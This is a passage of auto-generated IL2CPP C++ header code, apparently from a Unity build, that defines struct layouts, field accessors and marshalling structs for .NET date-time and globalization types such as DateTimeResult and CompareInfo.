inline void set_length_2(int32_t value) { ___length_2 = value; } inline static int32_t get_offset_of_type_3() { return static_cast<int32_t>(offsetof(DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D, ___type_3)); } inline int32_t get_type_3() const { return ___type_3; } inline int32_t* get_address_of_type_3() { return &___type_3; } inline void set_type_3(int32_t value) { ___type_3 = value; } inline static int32_t get_offset_of_value_4() { return static_cast<int32_t>(offsetof(DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D, ___value_4)); } inline int32_t get_value_4() const { return ___value_4; } inline int32_t* get_address_of_value_4() { return &___value_4; } inline void set_value_4(int32_t value) { ___value_4 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.DTSubString struct DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshaled_pinvoke { char* ___s_0; int32_t ___index_1; int32_t ___length_2; int32_t ___type_3; int32_t ___value_4; }; // Native definition for COM marshalling of System.DTSubString struct DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_marshaled_com { Il2CppChar* ___s_0; int32_t ___index_1; int32_t ___length_2; int32_t ___type_3; int32_t ___value_4; }; #endif // DTSUBSTRING_T0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D_H #ifndef DATETIMEFORMAT_T3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_H #define DATETIMEFORMAT_T3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeFormat struct DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8 : public RuntimeObject { public: public: }; struct DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields { public: // System.TimeSpan System.DateTimeFormat::NullOffset TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___NullOffset_0; // System.Char[] System.DateTimeFormat::allStandardFormats CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* ___allStandardFormats_1; // System.String[] System.DateTimeFormat::fixedNumberFormats StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* ___fixedNumberFormats_2; public: inline static int32_t get_offset_of_NullOffset_0() { return static_cast<int32_t>(offsetof(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields, ___NullOffset_0)); } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 get_NullOffset_0() const { return ___NullOffset_0; } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * get_address_of_NullOffset_0() { return &___NullOffset_0; } inline void set_NullOffset_0(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 value) { ___NullOffset_0 = value; } inline static int32_t get_offset_of_allStandardFormats_1() { return static_cast<int32_t>(offsetof(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields, ___allStandardFormats_1)); } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* get_allStandardFormats_1() const { return ___allStandardFormats_1; } inline CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2** get_address_of_allStandardFormats_1() { return &___allStandardFormats_1; } inline void set_allStandardFormats_1(CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2* value) { ___allStandardFormats_1 = value; Il2CppCodeGenWriteBarrier((&___allStandardFormats_1), value); } inline static int32_t get_offset_of_fixedNumberFormats_2() { return static_cast<int32_t>(offsetof(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields, ___fixedNumberFormats_2)); } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* get_fixedNumberFormats_2() const { return ___fixedNumberFormats_2; } inline StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E** get_address_of_fixedNumberFormats_2() { return &___fixedNumberFormats_2; } inline void set_fixedNumberFormats_2(StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E* value) { ___fixedNumberFormats_2 = value; Il2CppCodeGenWriteBarrier((&___fixedNumberFormats_2), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DATETIMEFORMAT_T3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_H #ifndef DATETIMERAWINFO_T9FCF0836569E074269DCA1D04061D8E3720D451E_H #define DATETIMERAWINFO_T9FCF0836569E074269DCA1D04061D8E3720D451E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeRawInfo struct DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E { public: // System.Int32* System.DateTimeRawInfo::num int32_t* ___num_0; // System.Int32 System.DateTimeRawInfo::numCount int32_t ___numCount_1; // System.Int32 System.DateTimeRawInfo::month int32_t ___month_2; // System.Int32 System.DateTimeRawInfo::year int32_t ___year_3; // System.Int32 System.DateTimeRawInfo::dayOfWeek int32_t ___dayOfWeek_4; // System.Int32 System.DateTimeRawInfo::era int32_t ___era_5; // System.DateTimeParse/TM System.DateTimeRawInfo::timeMark int32_t ___timeMark_6; // System.Double System.DateTimeRawInfo::fraction double ___fraction_7; // System.Boolean System.DateTimeRawInfo::hasSameDateAndTimeSeparators bool ___hasSameDateAndTimeSeparators_8; // System.Boolean System.DateTimeRawInfo::timeZone bool ___timeZone_9; public: inline static int32_t get_offset_of_num_0() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___num_0)); } inline int32_t* get_num_0() const { return ___num_0; } inline int32_t** get_address_of_num_0() { return &___num_0; } inline void set_num_0(int32_t* value) { ___num_0 = value; } inline static int32_t get_offset_of_numCount_1() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___numCount_1)); } inline int32_t get_numCount_1() const { return ___numCount_1; } inline int32_t* get_address_of_numCount_1() { return &___numCount_1; } inline void set_numCount_1(int32_t value) { ___numCount_1 = value; } inline static int32_t get_offset_of_month_2() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___month_2)); } inline int32_t get_month_2() const { return ___month_2; } inline int32_t* get_address_of_month_2() { return &___month_2; } inline void set_month_2(int32_t value) { ___month_2 = value; } inline static int32_t get_offset_of_year_3() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___year_3)); } inline int32_t get_year_3() const { return ___year_3; } inline int32_t* get_address_of_year_3() { return &___year_3; } inline void set_year_3(int32_t value) { ___year_3 = value; } inline static int32_t get_offset_of_dayOfWeek_4() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___dayOfWeek_4)); } inline int32_t get_dayOfWeek_4() const { return ___dayOfWeek_4; } inline int32_t* get_address_of_dayOfWeek_4() { return &___dayOfWeek_4; } inline void set_dayOfWeek_4(int32_t value) { ___dayOfWeek_4 = value; } inline static int32_t get_offset_of_era_5() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___era_5)); } inline int32_t get_era_5() const { return ___era_5; } inline int32_t* get_address_of_era_5() { return &___era_5; } inline void set_era_5(int32_t value) { ___era_5 = value; } inline static int32_t get_offset_of_timeMark_6() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___timeMark_6)); } inline int32_t get_timeMark_6() const { return ___timeMark_6; } inline int32_t* get_address_of_timeMark_6() { return &___timeMark_6; } inline void set_timeMark_6(int32_t value) { ___timeMark_6 = value; } inline static int32_t get_offset_of_fraction_7() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___fraction_7)); } inline double get_fraction_7() const { return ___fraction_7; } inline double* get_address_of_fraction_7() { return &___fraction_7; } inline void set_fraction_7(double value) { ___fraction_7 = value; } inline static int32_t get_offset_of_hasSameDateAndTimeSeparators_8() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___hasSameDateAndTimeSeparators_8)); } inline bool get_hasSameDateAndTimeSeparators_8() const { return ___hasSameDateAndTimeSeparators_8; } inline bool* get_address_of_hasSameDateAndTimeSeparators_8() { return &___hasSameDateAndTimeSeparators_8; } inline void set_hasSameDateAndTimeSeparators_8(bool value) { ___hasSameDateAndTimeSeparators_8 = value; } inline static int32_t get_offset_of_timeZone_9() { return static_cast<int32_t>(offsetof(DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E, ___timeZone_9)); } inline bool get_timeZone_9() const { return ___timeZone_9; } inline bool* get_address_of_timeZone_9() { return &___timeZone_9; } inline void set_timeZone_9(bool value) { ___timeZone_9 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.DateTimeRawInfo struct DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E_marshaled_pinvoke { int32_t* ___num_0; int32_t ___numCount_1; int32_t ___month_2; int32_t ___year_3; int32_t ___dayOfWeek_4; int32_t ___era_5; int32_t ___timeMark_6; double ___fraction_7; int32_t ___hasSameDateAndTimeSeparators_8; int32_t ___timeZone_9; }; // Native definition for COM marshalling of System.DateTimeRawInfo struct DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E_marshaled_com { int32_t* ___num_0; int32_t ___numCount_1; int32_t ___month_2; int32_t ___year_3; int32_t ___dayOfWeek_4; int32_t ___era_5; int32_t ___timeMark_6; double ___fraction_7; int32_t ___hasSameDateAndTimeSeparators_8; int32_t ___timeZone_9; }; #endif // DATETIMERAWINFO_T9FCF0836569E074269DCA1D04061D8E3720D451E_H #ifndef DATETIMERESULT_TF71BA2895BFBF33241086E9BDF836567EBD2F6AB_H #define DATETIMERESULT_TF71BA2895BFBF33241086E9BDF836567EBD2F6AB_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeResult struct DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB { public: // System.Int32 System.DateTimeResult::Year int32_t ___Year_0; // System.Int32 System.DateTimeResult::Month int32_t ___Month_1; // System.Int32 System.DateTimeResult::Day int32_t ___Day_2; // System.Int32 System.DateTimeResult::Hour int32_t ___Hour_3; // System.Int32 System.DateTimeResult::Minute int32_t ___Minute_4; // System.Int32 System.DateTimeResult::Second int32_t ___Second_5; // System.Double System.DateTimeResult::fraction double ___fraction_6; // System.Int32 System.DateTimeResult::era int32_t ___era_7; // System.ParseFlags System.DateTimeResult::flags int32_t ___flags_8; // System.TimeSpan System.DateTimeResult::timeZoneOffset TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___timeZoneOffset_9; // System.Globalization.Calendar System.DateTimeResult::calendar Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_10; // System.DateTime System.DateTimeResult::parsedDate DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___parsedDate_11; // System.ParseFailureKind System.DateTimeResult::failure int32_t ___failure_12; // System.String System.DateTimeResult::failureMessageID String_t* ___failureMessageID_13; // System.Object System.DateTimeResult::failureMessageFormatArgument RuntimeObject * ___failureMessageFormatArgument_14; // System.String System.DateTimeResult::failureArgumentName String_t* ___failureArgumentName_15; public: inline static int32_t get_offset_of_Year_0() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___Year_0)); } inline int32_t get_Year_0() const { return ___Year_0; } inline int32_t* get_address_of_Year_0() { return &___Year_0; } inline void set_Year_0(int32_t value) { ___Year_0 = value; } inline static int32_t get_offset_of_Month_1() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___Month_1)); } inline int32_t get_Month_1() const { return ___Month_1; } inline int32_t* get_address_of_Month_1() { return &___Month_1; } inline void set_Month_1(int32_t value) { ___Month_1 = value; } inline static int32_t get_offset_of_Day_2() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___Day_2)); } inline int32_t get_Day_2() const { return ___Day_2; } inline int32_t* get_address_of_Day_2() { return &___Day_2; } inline void set_Day_2(int32_t value) { ___Day_2 = value; } inline static int32_t get_offset_of_Hour_3() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___Hour_3)); } inline int32_t get_Hour_3() const { return ___Hour_3; } inline int32_t* get_address_of_Hour_3() { return &___Hour_3; } inline void set_Hour_3(int32_t value) { ___Hour_3 = value; } inline static int32_t get_offset_of_Minute_4() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___Minute_4)); } inline int32_t get_Minute_4() const { return ___Minute_4; } inline int32_t* get_address_of_Minute_4() { return &___Minute_4; } inline void set_Minute_4(int32_t value) { ___Minute_4 = value; } inline static int32_t get_offset_of_Second_5() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___Second_5)); } inline int32_t get_Second_5() const { return ___Second_5; } inline int32_t* get_address_of_Second_5() { return &___Second_5; } inline void set_Second_5(int32_t value) { ___Second_5 = value; } inline static int32_t get_offset_of_fraction_6() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___fraction_6)); } inline double get_fraction_6() const { return ___fraction_6; } inline double* get_address_of_fraction_6() { return &___fraction_6; } inline void set_fraction_6(double value) { ___fraction_6 = value; } inline static int32_t get_offset_of_era_7() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___era_7)); } inline int32_t get_era_7() const { return ___era_7; } inline int32_t* get_address_of_era_7() { return &___era_7; } inline void set_era_7(int32_t value) { ___era_7 = value; } inline static int32_t get_offset_of_flags_8() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___flags_8)); } inline int32_t get_flags_8() const { return ___flags_8; } inline int32_t* get_address_of_flags_8() { return &___flags_8; } inline void set_flags_8(int32_t value) { ___flags_8 = value; } inline static int32_t get_offset_of_timeZoneOffset_9() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___timeZoneOffset_9)); } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 get_timeZoneOffset_9() const { return ___timeZoneOffset_9; } inline TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * get_address_of_timeZoneOffset_9() { return &___timeZoneOffset_9; } inline void set_timeZoneOffset_9(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 value) { ___timeZoneOffset_9 = value; } inline static int32_t get_offset_of_calendar_10() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___calendar_10)); } inline Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * get_calendar_10() const { return ___calendar_10; } inline Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** get_address_of_calendar_10() { return &___calendar_10; } inline void set_calendar_10(Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * value) { ___calendar_10 = value; Il2CppCodeGenWriteBarrier((&___calendar_10), value); } inline static int32_t get_offset_of_parsedDate_11() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___parsedDate_11)); } inline DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 get_parsedDate_11() const { return ___parsedDate_11; } inline DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * get_address_of_parsedDate_11() { return &___parsedDate_11; } inline void set_parsedDate_11(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 value) { ___parsedDate_11 = value; } inline static int32_t get_offset_of_failure_12() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___failure_12)); } inline int32_t get_failure_12() const { return ___failure_12; } inline int32_t* get_address_of_failure_12() { return &___failure_12; } inline void set_failure_12(int32_t value) { ___failure_12 = value; } inline static int32_t get_offset_of_failureMessageID_13() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___failureMessageID_13)); } inline String_t* get_failureMessageID_13() const { return ___failureMessageID_13; } inline String_t** get_address_of_failureMessageID_13() { return &___failureMessageID_13; } inline void set_failureMessageID_13(String_t* value) { ___failureMessageID_13 = value; Il2CppCodeGenWriteBarrier((&___failureMessageID_13), value); } inline static int32_t get_offset_of_failureMessageFormatArgument_14() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___failureMessageFormatArgument_14)); } inline RuntimeObject * get_failureMessageFormatArgument_14() const { return ___failureMessageFormatArgument_14; } inline RuntimeObject ** get_address_of_failureMessageFormatArgument_14() { return &___failureMessageFormatArgument_14; } inline void set_failureMessageFormatArgument_14(RuntimeObject * value) { ___failureMessageFormatArgument_14 = value; Il2CppCodeGenWriteBarrier((&___failureMessageFormatArgument_14), value); } inline static int32_t get_offset_of_failureArgumentName_15() { return static_cast<int32_t>(offsetof(DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB, ___failureArgumentName_15)); } inline String_t* get_failureArgumentName_15() const { return ___failureArgumentName_15; } inline String_t** get_address_of_failureArgumentName_15() { return &___failureArgumentName_15; } inline void set_failureArgumentName_15(String_t* value) { ___failureArgumentName_15 = value; Il2CppCodeGenWriteBarrier((&___failureArgumentName_15), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif // Native definition for P/Invoke marshalling of System.DateTimeResult struct DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB_marshaled_pinvoke { int32_t ___Year_0; int32_t ___Month_1; int32_t ___Day_2; int32_t ___Hour_3; int32_t ___Minute_4; int32_t ___Second_5; double ___fraction_6; int32_t ___era_7; int32_t ___flags_8; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___timeZoneOffset_9; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_10; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___parsedDate_11; int32_t ___failure_12; char* ___failureMessageID_13; Il2CppIUnknown* ___failureMessageFormatArgument_14; char* ___failureArgumentName_15; }; // Native definition for COM marshalling of System.DateTimeResult struct DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB_marshaled_com { int32_t ___Year_0; int32_t ___Month_1; int32_t ___Day_2; int32_t ___Hour_3; int32_t ___Minute_4; int32_t ___Second_5; double ___fraction_6; int32_t ___era_7; int32_t ___flags_8; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___timeZoneOffset_9; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * ___calendar_10; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___parsedDate_11; int32_t ___failure_12; Il2CppChar* ___failureMessageID_13; Il2CppIUnknown* ___failureMessageFormatArgument_14; Il2CppChar* ___failureArgumentName_15; }; #endif // DATETIMERESULT_TF71BA2895BFBF33241086E9BDF836567EBD2F6AB_H #ifndef DATETIMETOKEN_T436C025529619757E8E523CBE557A4C31C920761_H #define DATETIMETOKEN_T436C025529619757E8E523CBE557A4C31C920761_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.DateTimeToken struct DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 { public: // System.DateTimeParse/DTT System.DateTimeToken::dtt int32_t ___dtt_0; // System.TokenType System.DateTimeToken::suffix int32_t ___suffix_1; // System.Int32 System.DateTimeToken::num int32_t ___num_2; public: inline static int32_t get_offset_of_dtt_0() { return static_cast<int32_t>(offsetof(DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761, ___dtt_0)); } inline int32_t get_dtt_0() const { return ___dtt_0; } inline int32_t* get_address_of_dtt_0() { return &___dtt_0; } inline void set_dtt_0(int32_t value) { ___dtt_0 = value; } inline static int32_t get_offset_of_suffix_1() { return static_cast<int32_t>(offsetof(DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761, ___suffix_1)); } inline int32_t get_suffix_1() const { return ___suffix_1; } inline int32_t* get_address_of_suffix_1() { return &___suffix_1; } inline void set_suffix_1(int32_t value) { ___suffix_1 = value; } inline static int32_t get_offset_of_num_2() { return static_cast<int32_t>(offsetof(DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761, ___num_2)); } inline int32_t get_num_2() const { return ___num_2; } inline int32_t* get_address_of_num_2() { return &___num_2; } inline void set_num_2(int32_t value) { ___num_2 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // DATETIMETOKEN_T436C025529619757E8E523CBE557A4C31C920761_H #ifndef COMPAREINFO_TB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1_H #define COMPAREINFO_TB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.CompareInfo struct CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 : public RuntimeObject { public: // System.String System.Globalization.CompareInfo::m_name String_t* ___m_name_3; // System.String System.Globalization.CompareInfo::m_sortName String_t* ___m_sortName_4; // System.Int32 System.Globalization.CompareInfo::win32LCID int32_t ___win32LCID_5; // System.Int32 System.Globalization.CompareInfo::culture int32_t ___culture_6; // System.Globalization.SortVersion System.Globalization.CompareInfo::m_SortVersion SortVersion_tE7080CE09A0B8CE226F8046C0D1374DD0A0CAE71 * ___m_SortVersion_20; // Mono.Globalization.Unicode.SimpleCollator System.Globalization.CompareInfo::collator SimpleCollator_tC3A1720B7D3D850D5C23BE8E366D821EBA923D89 * ___collator_21; public: inline static int32_t get_offset_of_m_name_3() { return static_cast<int32_t>(offsetof(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1, ___m_name_3)); } inline String_t* get_m_name_3() const { return ___m_name_3; } inline String_t** get_address_of_m_name_3() { return &___m_name_3; } inline void set_m_name_3(String_t* value) { ___m_name_3 = value; Il2CppCodeGenWriteBarrier((&___m_name_3), value); } inline static int32_t get_offset_of_m_sortName_4() { return static_cast<int32_t>(offsetof(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1, ___m_sortName_4)); } inline String_t* get_m_sortName_4() const { return ___m_sortName_4; } inline String_t** get_address_of_m_sortName_4() { return &___m_sortName_4; } inline void set_m_sortName_4(String_t* value) { ___m_sortName_4 = value; Il2CppCodeGenWriteBarrier((&___m_sortName_4), value); } inline static int32_t get_offset_of_win32LCID_5() { return static_cast<int32_t>(offsetof(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1, ___win32LCID_5)); } inline int32_t get_win32LCID_5() const { return ___win32LCID_5; } inline int32_t* get_address_of_win32LCID_5() { return &___win32LCID_5; } inline void set_win32LCID_5(int32_t value) { ___win32LCID_5 = value; } inline static int32_t get_offset_of_culture_6() { return static_cast<int32_t>(offsetof(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1, ___culture_6)); } inline int32_t get_culture_6() const { return ___culture_6; } inline int32_t* get_address_of_culture_6() { return &___culture_6; } inline void set_culture_6(int32_t value) { ___culture_6 = value; } inline static int32_t get_offset_of_m_SortVersion_20() { return static_cast<int32_t>(offsetof(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1, ___m_SortVersion_20)); } inline SortVersion_tE7080CE09A0B8CE226F8046C0D1374DD0A0CAE71 * get_m_SortVersion_20() const { return ___m_SortVersion_20; } inline SortVersion_tE7080CE09A0B8CE226F8046C0D1374DD0A0CAE71 ** get_address_of_m_SortVersion_20() { return &___m_SortVersion_20; } inline void set_m_SortVersion_20(SortVersion_tE7080CE09A0B8CE226F8046C0D1374DD0A0CAE71 * value) { ___m_SortVersion_20 = value; Il2CppCodeGenWriteBarrier((&___m_SortVersion_20), value); } inline static int32_t get_offset_of_collator_21() { return static_cast<int32_t>(offsetof(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1, ___collator_21)); } inline SimpleCollator_tC3A1720B7D3D850D5C23BE8E366D821EBA923D89 * get_collator_21() const { return ___collator_21; } inline SimpleCollator_tC3A1720B7D3D850D5C23BE8E366D821EBA923D89 ** get_address_of_collator_21() { return &___collator_21; } inline void set_collator_21(SimpleCollator_tC3A1720B7D3D850D5C23BE8E366D821EBA923D89 * value) { ___collator_21 = value; Il2CppCodeGenWriteBarrier((&___collator_21), value); } }; struct CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1_StaticFields { public: // System.Collections.Generic.Dictionary`2<System.String,Mono.Globalization.Unicode.SimpleCollator> System.Globalization.CompareInfo::collators Dictionary_2_t61B96E9258C1E296057BCD8C4D2015846D2BB8F3 * ___collators_22; // System.Boolean System.Globalization.CompareInfo::managedCollation bool ___managedCollation_23; // System.Boolean System.Globalization.CompareInfo::managedCollationChecked bool ___managedCollationChecked_24; public: inline static int32_t get_offset_of_collators_22() { return static_cast<int32_t>(offsetof(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1_StaticFields, ___collators_22)); } inline Dictionary_2_t61B96E9258C1E296057BCD8C4D2015846D2BB8F3 * get_collators_22() const { return ___collators_22; } inline Dictionary_2_t61B96E9258C1E296057BCD8C4D2015846D2BB8F3 ** get_address_of_collators_22() { return &___collators_22; } inline void set_collators_22(Dictionary_2_t61B96E9258C1E296057BCD8C4D2015846D2BB8F3 * value) { ___collators_22 = value; Il2CppCodeGenWriteBarrier((&___collators_22), value); } inline static int32_t get_offset_of_managedCollation_23() { return static_cast<int32_t>(offsetof(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1_StaticFields, ___managedCollation_23)); } inline bool get_managedCollation_23() const { return ___managedCollation_23; } inline bool* get_address_of_managedCollation_23() { return &___managedCollation_23; } inline void set_managedCollation_23(bool value) { ___managedCollation_23 = value; } inline static int32_t get_offset_of_managedCollationChecked_24() { return static_cast<int32_t>(offsetof(CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1_StaticFields, ___managedCollationChecked_24)); } inline bool get_managedCollationChecked_24() const { return ___managedCollationChecked_24; } inline bool* get_address_of_managedCollationChecked_24() { return &___managedCollationChecked_24; } inline void set_managedCollationChecked_24(bool value) { ___managedCollationChecked_24 = value; } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // COMPAREINFO_TB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1_H #ifndef DATETIMEFORMATINFO_TF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_H #define DATETIMEFORMATINFO_TF4BB3AA482C2F772D2A9022F78BF8727830FAF5F_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Globalization.DateTimeFormatInfo struct DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F : public RuntimeObject { public: // System.Globalization.CultureData System.Globalization.DateTimeFormatInfo::m_cultureData CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD * ___m_cultureData_1; // System.String System.Globalization.DateTimeFormatInfo::m_name String_t* ___m_name_2; // System.String System.Globalization.DateTimeFormatInfo::m_langName String_t* ___m_langName_3; // System.Globalization.CompareInfo System.Globalization.DateTimeFormatInfo::m_compareInfo CompareInfo_tB9A071DBC11AC00AF2EA2066D0C2AE1DCB1865D1 * ___m_compareInfo_4; // System.Globalization.CultureInfo System.Globalization.DateTimeFormatInfo::m_cultureInfo CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * ___m_cultureInfo_5; // System.String System.Globalization.DateTimeFormatInfo::amDesignator String_t* ___amDesignator_6; // System.String System.Globalization.DateTimeFormatInfo::pmDesignator String_t* ___pmDesignator_7; // System.String System.Globalization.DateTimeFormatInfo::dateSeparator String_t* ___dateSeparator_8; // System.String System.Globalization.DateTimeFormatInfo::generalShortTimePattern String_t* ___generalShortTimePattern_9; // System.String System.Globalization.DateTimeFormatInfo::generalLongTimePattern String_t* ___generalLongTimePattern_10; // System.String System.Globalization.DateTimeFormatInfo::timeSeparator String_t* ___timeSeparator_11; // System.String System.Globalization.DateTimeFormatInfo::monthDayPattern String_t* ___monthDayPattern_12; // System.String System.Globalization.DateTimeFormatInfo::dateTimeOffsetPattern String_t* ___dateTimeOffsetPattern_13; // System.Globalization.Calendar System.Globalization.DateTimeFormatInfo::calendar 